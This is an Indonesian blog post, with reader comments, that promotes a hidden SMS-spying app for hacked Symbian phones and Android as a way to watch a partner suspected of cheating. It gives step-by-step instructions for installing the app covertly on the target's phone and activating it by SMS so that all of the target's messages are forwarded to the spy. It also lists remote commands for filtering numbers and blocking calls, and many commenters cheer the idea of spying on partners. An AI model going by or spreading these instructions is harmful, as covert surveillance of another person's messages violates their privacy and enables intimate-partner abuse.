aplikasi sadap sms untuk v3/v5 unsigned dan android

Diposting oleh HeRmaN SisX sLaLuAda pada 08:39, 27-Mei-12

Di: APLIKASI S60 3RD

Ass.wr.wb

Selamat malam para symbianer yang jago uprak aprek hpbiggrin,kali ini saya mau berbagi aplikasi sadap sms,mungkin aplikasi ini berguna buat sobat yang punya pacar sering selingkuh,intinya kita pantau sms pacar kita,

ok tidak usah panjang lebar mari kita simak di bawah ini

1. Siapkan 2 ponsel, satu ponsel kamu (sebagai penyadap), dan satunya ponsel target (yang di sadap), yang v3/v5 tentunya yang sudah kamu hack kalo blum di hack silahkan masuk disini

sedangkan ponsel kamu (penyadap) bisa type apa aja, bahkan ponsel yang masih hitam putih pun juga bisa.

2. Selanjutnya instal aplikasinya ke ponsel target, tenang aja.. Aplikasi ini sifatnya hidden/ sembunyi, jadi tidak akan muncul di ponsel target sehingga pemilik ponsel tidak tahu kalo ponselnya telah di pasang aplikasi penyadap.

3. Jika penginstalan sudah selesai, selanjutnya melakukan pengaktifan aplikasi tersebut dengan cara mengirim sms ke ponsel target

Isi sms sebagai berikut: Ketik Set admin 081314xxxxxx terus kirim ke ponsel target. Catatan: Nomor 081314xxxxxx adalah nomor kamu/penyadap, artinya semua sms masuk dan keluar di ponsel target secara otomatis akan dikirim ke nomor 081314xxxxxx . Silahkan ganti nomor tersebut dengan nomor kamu.

Sekarang kamu coba sms ke ponsel target pake sembarang nomor, selang beberapa menit, sms yang kamu kirimkan ke ponsel target tadi akan dikirim balik ke nomor yang telah kamu jadikan penyadap tadi.

Contoh gambar aktifitas sms yang telah berhasil aku sadap

sms1.jpg

gambar di atas ponsel yang aku sadap sedang melakukan sms ke nomor 0838125xxxxx, yang isinya " sob tolong donk like postnya aa herman sisx yg ganteng kalem To:+62838125xxxxx "

sms2.jpg

Gambar di atas ponsel yang aku sadap mendapat sms dari 083851254xxxx yang isinya "ya sob saya akan like postnya aa herman yg ganteng kalem hehe fr:+62838125xxxx "

mantap kan segala sms keluar atau masuk kita bisa tahu,

nah kalo yang mau nyoba silahkan simak dulu di bawah ini

Berikut ini panduan laen untuk mengoperasikan aplikasi tersebut.

Off: Untuk menghentikan sementara penyadapan

On : Mengaktifkan lagi penyadapan Add sender +6281314XXXX, +62838125XXXX : Untuk menyadap aktifitas sms dari dan ke nomer tertentu saja.

Add : Untuk kembali menyadap semua nomer ponsel tanpa terkecuali.

Block on : Untuk memblok semua aktifitas telpon masuk dan keluar yang disadap.

Block off : Untuk mematikan blokir telpon diatas .

Kirimkan kode kode di atas melalui sms ke ponsel target.

ok bagi yang mau nyoba silahkan download aplikasinya disini

dan untuk android disini tapi buat android saya tidak menjelaskan cara penggunaannya karna saya tidak punya android,silahkan aja coba sendiri,

Mohon gunakan aplikasi ini dengan bijak, segala dampak negatif karena penyalah guna'an bukan tanggung jawab saya.

semoga bermanfaat terima kasih atas kunjungnnya.

liker.jpg>

Bagikan ke Facebook Bagikan ke Twitter

Komentar

66 tanggapan untuk "aplikasi sadap sms untuk v3/v5 unsigned dan android"

Miauw  bassiesT pada 09:53, 27-Mei-12

Java mangap master rolleyes sadap sadap kodok satu ke kodok ijo ganti lol
right-arrow mrgreen left-arrow

Kode Voucher Pulsa pada 11:12, 27-Mei-12

wah sayang aku ga punya pacar, hehehe

Rosyidin Baladewa pada 11:18, 27-Mei-12

v2 ngewes gan... sad
skses slalu..

treesno pada 11:28, 27-Mei-12

kunjungan balik sob biggrin, buat hp java gga bisa ya

'kodells.mbim pada 11:38, 27-Mei-12

Pagi sob.. muantap..lah. buat java kalo ada share y sob.

Soni pada 11:56, 27-Mei-12

Nyimak ja sob coz hp ane v1 sob hehebiggrin

Irzaa♫♬ pada 11:57, 27-Mei-12

Pagi master, wah keren dan oke punya bgt nieh postinganx.. Boleh d.coba, thankz dah berbagi ilmunya..

Irzaa♫♬ pada 11:58, 27-Mei-12

Pagi master, wah keren dan oke punya bgt nieh postinganx.. Boleh d.coba, thankz dah berbagi ilmunya..

NoEr Mobile Blog pada 12:15, 27-Mei-12

bisa di coba ni..mksh y mster yg ganteng kalem biggrin

Dickydarius pada 12:52, 27-Mei-12

bagus keknya, itu ss pake hp apa?

☆ HeRmAn™SisX☆ pada 13:12, 27-Mei-12

Dickydarius@ C5.00 mastr
all@ thanks atas knjngnnya

Estu pada 13:13, 27-Mei-12

Wah,mantap sobt...buat nyadap hp pacarku nich.smile

Dhanie pada 13:33, 27-Mei-12

request buat hp china masterbiggrin syg hp ane java.

ipunkwardana pada 13:39, 27-Mei-12

wahhh semakin mantap nich master
Tetep semangat dan terus berkreasi
8)
8)
Sukses buat anda
biggrin
biggrin
www.ipunkwardana.com
arrow

Gondrong_poni™ pada 13:43, 27-Mei-12

Wah keren kang?? Mantep app penyadapnya?biggrin

Rizky Hermawan pada 13:44, 27-Mei-12

mantap master. Ijin comot yah

D'JangkriX | VideoBokep3gp pada 13:51, 27-Mei-12

wuih mantap tuh.. smile
Tp klo yg mo disadap hp'a java gmana? :Tp klo yg mo disadap hp'a java gmana? confused

Pay Akhmad pada 14:32, 27-Mei-12

pertamax

Dieny pada 14:34, 27-Mei-12

kunjungan pagi sob cuma bisa nyimak. Oh iya mau follow sob follback dtunggu

http://dieny.pun.bz

Bzaind Packetrock Syns pada 15:09, 27-Mei-12

Mantabz, keren pula,,,

za izin bungkus om! smile

Anzas pada 15:35, 27-Mei-12

sayang 2 handpone diperlukan, aku kira tidak

Nazar The-darkAngelofdeath pada 15:46, 27-Mei-12

wah, bwt android ada gak yah?

Muhammad Yassin pada 15:52, 27-Mei-12

wah mantap..

satria langit andromeda pada 16:07, 27-Mei-12

untung ane dah ga punya pacar sob,,
heheheheh

☆ HeRmAn™SisX☆ pada 16:12, 27-Mei-12

satria langit andromeda@ wkwkwk snang bgt yah gx pya pcrbiggrinbiggrin tpi gx da yg nangisin sobmrgreen

Saiya Sanzu pada 16:51, 27-Mei-12

hp jadul minyk dah..hehe

Anash Syahusein pada 17:53, 27-Mei-12

ane sundul ya oke, ndul ndul ndulcheesy-grin

http://anashusen.net

Andrianto pada 18:14, 27-Mei-12

Waduh sayang bgt sob, pasanganku pakek hp java, jd ngk nyambung deh.. Trimz dah share.. smile

LeeHyuk Jae pada 18:48, 27-Mei-12

sob, kq gx muncul flag counternx? yg muncul cma tulisannx?

☆ HeRmAn™SisX☆ pada 18:53, 27-Mei-12

LeeHyuk Jae@ alamt blog ente apa? Tar jga muncul satu satu sob

ACHENES pada 19:41, 27-Mei-12

keren ni,,,,,,,ijin ah

Dev Vescera pada 21:17, 27-Mei-12

lebih keren dr sms forwarder ya bro.. Ane save ah.. smile

Rachman665 pada 22:15, 27-Mei-12

Kunjungan sore sob di tunggu kedatangan nya.,,

Soma Starprince pada 22:52, 27-Mei-12

java masih pantau aja gan biggrin
semoga bermanfaat mrgreen

Ervan Setiawan pada 23:28, 27-Mei-12

mantap nich keren Sob !

Wind'ecko pada 23:59, 27-Mei-12

brrti makan pulsa smsnya double y sob?

Fikri pada 00:05, 28-Mei-12

aku baru diMWB ,
mohon bimbingannya yeah...

smile

☆ HeRmAn™SisX☆ pada 00:36, 28-Mei-12

Wind'ecko@ gx sob itu cma laporan aja
all@ thanks atas kunjungnnya

Abudzar pada 01:55, 28-Mei-12

Wah boleh jg nih aplikasi

Rezjutshu pada 02:57, 28-Mei-12

Udah ada sob, nyimak aja

KUMPULANLINK . PUN . BZ (Blognya Mbah Jambrong) pada 03:15, 28-Mei-12

kunjungan malam sob..smile,silakan berkunjung balik smile

ARISAN pada 04:15, 28-Mei-12

wah top banget, nih kang...ijin coba..

《★SitoVj™★》 pada 05:28, 28-Mei-12

Keren aplikasinya.. smile tpi ane cuma bisa nyimax sad hp java.

Brangas pada 06:12, 28-Mei-12

Java minyak aja sambil nyengir sob.....!!!!!

FB MUJAB NET pada 06:36, 28-Mei-12

waw v2 jadinya gak iso pake sad

FB MUJAB NET pada 06:37, 28-Mei-12

INI aku

M.NOGISA.COM

Ibrahim pada 08:16, 28-Mei-12

kunjungan perdana master,...,
ditunggu folbacknya

SoegA87 pada 12:17, 28-Mei-12

wah mntap tu sob

Andm_efc pada 13:07, 28-Mei-12

kunjungan perdanaxx master biggrin
Minyak dulu ..

sukses selalu

• yooseki • pada 14:23, 28-Mei-12

Kunjungan pagi sob cheesy-grin
java cuma bs minxak tiap kesiniranger

http://yooseki.heck.in

Kusadi Jengri pada 15:43, 28-Mei-12

wuih dah rame neh, ane telat ndan bis kondangan. perduax y..* slam dw jari ah..

user mwb ™ pada 17:30, 28-Mei-12

assalamualaikum warohmatullahi wabarokatuh

kunjungan siang hari kawan.waduh sayang banget hp ku hp cina.padahal mau nyadap telponnya nazarudin lho.smile

Ikhwan pada 21:18, 28-Mei-12

hp ane jangan disapdap gan hehe

Nazmy Namy pada 22:29, 28-Mei-12

kunjungan sore gan
ijin lyt2 y.............

Irzaa♫♬ pada 00:09, 29-Mei-12

Met petang jelang mlm master,, iya boleh aja, qta sama2 belajar, mau via apa nieh qta blajarx, biggrin

диди sдlвнцтz pada 00:33, 29-Mei-12

ma'af terlambat kawan
bbrapa hari ini emg lg ad urusan hati..
Suxes sll untuk admin dan blognya

Unbreakable pada 08:15, 29-Mei-12

V2 cuma bisa nyimak sad

Khant Berxco Sundanese™ pada 16:33, 29-Mei-12

symbian gak ada hbsnya lur..


Berpartisipasi kunjungan balik.

http://aberxco.mywapblog.com/erds-shoot-screen-shoot-terbaik.xhtml

"SALAM KOPI HITAM"

Nazmy Namy pada 16:52, 29-Mei-12

assalamualaikum..
kunjungan siang sob, tetap
smangat & sukses selalu..
mampir ya..
Jgn lupa folback.x

http://namybws.heck.in/

Aunul Rafik pada 18:55, 29-Mei-12

kunjungan siang neh master biggrin aplikasi sadap pacar org gk ada ya? Ckckckckc biggrin

user mwb ™ pada 19:29, 29-Mei-12

kemana ya adminnya,kok ga ada.apa malas jawab komentar karena yg datang pada bawa minyak sama pertamak ya.

☆ HeRmAn™SisX☆ pada 23:43, 29-Mei-12

user mwb ™@biggrinbiggrinbiggrin master kalo gx da prtnyaan mh ane mls jwbnya,,
all@thanks atas kunjungn master,

Allabouts60v5 pada 23:58, 29-Mei-12

udah punya sob nyimak aja

achewok pada 16:10, 12-Jun-12

klo nokia seri e5 bisa gak ya ?? Symbian 9.3 - Series 60 rel. 3.2

Riski fadli pada 20:40, 03-Okt-12

kunjungan siangg


bro ijin folow ya, di tunggu kunbal and Folback nya.......

salam kenallll

Putra pada 10:23, 25-Nov-12

Mas jenis hp apa aja, makasih

Langganan komentar: [RSS] [Atom]

Komentar Baru

Komentar terbaru dinonaktifkan pada posting ini.